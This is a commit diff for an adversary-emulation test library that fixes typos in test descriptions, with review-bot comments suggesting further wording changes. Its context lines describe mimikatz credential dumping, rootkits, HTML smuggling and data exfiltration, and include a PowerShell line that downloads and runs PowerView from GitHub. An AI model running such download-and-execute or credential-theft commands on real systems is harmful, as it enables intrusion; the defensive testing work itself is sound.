Spelling adjustments (#2448)

Looking over the YAMLs mostly, only changes for readability or accuracy
KillrBunn3
2023-05-31 16:50:22 -04:00
committed by GitHub
parent 1c1f63ede7
commit 65294196d0
14 changed files with 18 additions and 18 deletions
+2 -2
@@ -183,7 +183,7 @@ atomic_tests:
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
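Review bot: the first description line of this hunk, left as unchanged context, still reads "get_prereq_command's", a possessive apostrophe used for a plural. Since this pass is about readability, change it to "get_prereq_commands" (or "the get_prereq_command entries") in the same commit.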
@@ -274,7 +274,7 @@ atomic_tests:
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
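Review bot: the corrected line quotes "ERROR kuhl_m_sekurlsa_acquireLSA" with plain double quotes, while the context line just above it writes \"access denied\" with backslash escapes. If this description is a YAML block scalar the backslashes are kept literally and will show up in the rendered text, so use one quoting style for both. The first context line also spells the product "Powershell" rather than "PowerShell".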
+1 -1
@@ -49,7 +49,7 @@ atomic_tests:
description: |
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
supported_platforms:
- windows
+2 -2
@@ -9,7 +9,7 @@ atomic_tests:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
@@ -51,7 +51,7 @@ atomic_tests:
- linux
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
description: Path to the rootkit source. Used when prerequisites are fetched.
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_name:
+1 -1
@@ -378,7 +378,7 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
<br/>
## Atomic Test #9 - DNS Server Discovery Using nslookup
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by Qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
**Supported Platforms:** Windows
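Review bot: the "Qakbot" capitalization in this Markdown hunk has no matching YAML hunk anywhere in this commit, unlike the Get-WmiObject heading change, which is made in both the Markdown and the YAML. If the Markdown is generated from the YAML, this fix will be lost on the next regeneration, so apply it to the test's YAML description as well. The same sentence still has lowercase "dns" and "ldap" and runs straight into "reference https://..." with no punctuation.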
+1 -1
@@ -748,7 +748,7 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R
<br/>
<br/>
## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
## Atomic Test #19 - Get-WmiObject to Enumerate Domain Controllers
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
Upon successful execution a listing of Systems from AD will output with their paths.
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+1 -1
@@ -362,7 +362,7 @@ atomic_tests:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
name: powershell
- name: Get-wmiobject to Enumerate Domain Controllers
- name: Get-WmiObject to Enumerate Domain Controllers
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
description: |
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
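Review bot: the description in the last context line still spells the cmdlet "get-wmiobject" while the name line now uses "Get-WmiObject", so the test name and its own description disagree after this change. Update the description to "Get-WmiObject" too; the Markdown hunk for the same test has the same mismatch between its heading and the sentence below it.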
+1 -1
@@ -37,7 +37,7 @@ atomic_tests:
description: |
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
supported_platforms:
- windows
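Review bot: the corrected sentence is still ungrammatical after the "contained" fix, because it keeps two verbs: "is named as T1027.004_DynamicCompile.exe is contained in". Suggest "The exe file that will be executed, T1027.004_DynamicCompile.exe, is contained in the 'bin' folder of this atomic, and its source code is in the 'src' folder."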
+1 -1
@@ -5,7 +5,7 @@ atomic_tests:
- name: HTML Smuggling Remote Payload
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
description: |
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction.
The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction.
The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)
supported_platforms:
- windows
+1 -1
@@ -188,7 +188,7 @@ atomic_tests:
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path/filename to save the dowloaded file to
description: Local path/filename to save the downloaded file to
type: path
default: Atomic-license.txt
executor:
+2 -2
@@ -1,7 +1,7 @@
attack_technique: T1039
display_name: Data from Network Shared Drive
atomic_tests:
- name: Copy a sensitive File over Administive share with copy
- name: Copy a sensitive File over Administrative share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
description: |-
Copy from sensitive File from the c$ of another LAN computer with copy cmd
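Review bot: the changed line is the test's name field, not free-text description, so correcting "Administive" to "Administrative" changes the string that anything selecting or reporting this test by name will see. The auto_generated_guid on the next line is untouched, so GUID-based references are unaffected, but the rename should be called out in the commit message. The description in the last context line also still reads "Copy from sensitive File from the c$", which has a stray "from".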
@@ -43,7 +43,7 @@ atomic_tests:
del %TEMP%\#{local_file}
name: command_prompt
elevation_required: true
- name: Copy a sensitive File over Administive share with Powershell
- name: Copy a sensitive File over Administrative share with Powershell
auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
description: |-
Copy from sensitive File from the c$ of another LAN computer with powershell
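Review bot: the renamed test still ends in "with Powershell" on the changed name line and "with powershell" in the description below it. Since the name is being edited anyway, use "PowerShell" in both places so the rename only has to happen once.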
+2 -2
@@ -24,7 +24,7 @@ atomic_tests:
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
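Review bot: on the corrected line, "a single or range of addresses" is still missing a noun after "single". Suggest "to contact a single address or a range of addresses on port 80 to determine whether it is listening".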
@@ -167,7 +167,7 @@ atomic_tests:
fruit -noninteractive -consoleoutput
name: powershell
- name: Network Service Discovery for Containers
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
supported_platforms:
- containers
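Review bot: the removed and added auto_generated_guid lines carry identical text, so this change is whitespace only, which the commit message ("only changes for readability or accuracy") does not mention. Indentation is significant in YAML, so confirm that the key now lines up with its sibling keys name and description and that the file still parses, and note the whitespace fix in the commit message.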
+1 -1
@@ -41,7 +41,7 @@ atomic_tests:
When the test completes, a service information will be displayed on the screen if it exists.
A common feedback message is that "No instance(s) Available" if the service queried is not running.
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable"
if the provided remote host is unreacheable
if the provided remote host is unreachable
supported_platforms:
- windows
input_arguments:
+1 -1
@@ -92,7 +92,7 @@ atomic_tests:
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
+1 -1
@@ -52,7 +52,7 @@ atomic_tests:
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
description: |
DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!!
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
supported_platforms:
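Review bot: the corrected line still mixes verb forms in "allows for transferring (exfiltrate) a file", where the parenthetical should match the gerund. Suggest "allows transferring (exfiltrating) a file over a DNS request covert channel". The context line two below also has lowercase "github" where "GitHub" is meant.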